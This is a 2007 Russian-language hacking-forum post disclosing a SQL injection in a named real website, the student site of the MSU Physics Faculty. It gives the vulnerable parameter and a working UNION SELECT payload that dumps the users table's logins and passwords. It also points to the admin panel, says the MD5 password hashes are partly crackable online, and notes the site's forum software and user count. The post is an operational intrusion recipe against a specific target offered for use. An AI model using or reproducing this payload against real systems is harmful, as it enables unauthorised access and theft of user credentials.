18.04.2007, 22:06
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql-inj
Сайт: http://www.dubinushka.ru/ (Студенческий сайт Физического факультета МГУ)
уязвимость: http://www.dubinushka.ru/photo_podthemes.php?pt_id=10'
подобранные таблицы: users
подобранные поля: login,pass
17 организмов
http://www.dubinushka.ru/photo_podthemes.php?pt_id=10+and+1=0+union+select+ 11,22,login,pass+from+users/*
Имеются на сайте:
админка http://www.dubinushka.ru/admin/
В неё можно зайти под любым логином из 17-ти, зная пароль, (пароли md5, несколько сразу находятся в онлайне)
Форум - ipb 2.1.7 - 5k+ организмов.
|
|
|